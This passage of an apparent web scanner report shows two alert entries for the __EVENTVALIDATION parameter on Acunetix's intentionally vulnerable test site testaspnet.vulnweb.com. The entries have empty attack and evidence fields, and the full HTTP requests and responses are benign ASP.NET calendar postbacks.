are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8306&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDA%2B2LkoNoIZGRkZIaOw12aCAwmptJ8Co0HQaGMDbY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKO84e9AQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIth0kiqzVGtQtvIimpe0mljUPekQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:34 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDA+2LkoNoIZGRkZIaOw12aCAwmptJ8Co0HQaGMDbY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKO84e9AQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIth0kiqzVGtQtvIimpe0mljUPekQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:White" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8488&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAKoroL9sIZGRkVN7n29Gtjjegh5RN%2BYI60rbvb3s%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKOivOzBQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdpaMne%2BauSh5SXSrwti00io9UWOg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:43 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAKoroL9sIZGRkVN7n29Gtjjegh5RN+YI60rbvb3s=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKOivOzBQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdpaMne+auSh5SXSrwti00io9UWOg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:White" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> 